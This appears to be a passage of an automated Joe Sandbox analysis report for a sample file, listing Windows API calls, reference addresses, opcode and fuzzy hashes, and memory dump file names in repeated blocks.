                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcscpy$_wcscat
                                          • String ID:
                                          • API String ID: 2037614760-0
                                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                          • VariantClear.OLEAUT32(?), ref: 00451CA1
                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                          • String ID:
                                          • API String ID: 960795272-0
                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                          APIs
                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                          • EndPaint.USER32(?,?), ref: 00447D13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                          • String ID:
                                          • API String ID: 4189319755-0
                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                          APIs
                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                          • String ID:
                                          • API String ID: 1976402638-0
                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                          APIs
                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Variant$Copy$ClearErrorLast
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 2487901850-572801152
                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                          APIs
                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Enable$Show$MessageSend
                                          • String ID:
                                          • API String ID: 1871949834-0
                                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                          APIs
                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                          • SendMessageW.USER32 ref: 00471AE3
                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                          • String ID:
                                          • API String ID: 3611059338-0
                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                          • String ID:
                                          • API String ID: 1640429340-0
                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                          APIs
                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                          • _wcslen.LIBCMT ref: 004438CD
                                          • _wcslen.LIBCMT ref: 004438E6
                                          • _wcstok.LIBCMT ref: 004438F8
                                          • _wcslen.LIBCMT ref: 0044390C
                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                          • _wcstok.LIBCMT ref: 00443931
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                          • String ID:
                                          • API String ID: 3632110297-0
                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                          • String ID:
                                          • API String ID: 752480666-0
                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                          • String ID:
                                          • API String ID: 3275902921-0
                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                          • String ID:
                                          • API String ID: 3275902921-0
                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                          APIs
                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                          APIs
                                          • SendMessageW.USER32 ref: 004555C7
                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                          • DeleteObject.GDI32(?), ref: 00455736
                                          • DeleteObject.GDI32(?), ref: 00455744
                                          • DestroyIcon.USER32(?), ref: 00455752
                                          • DestroyWindow.USER32(?), ref: 00455760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
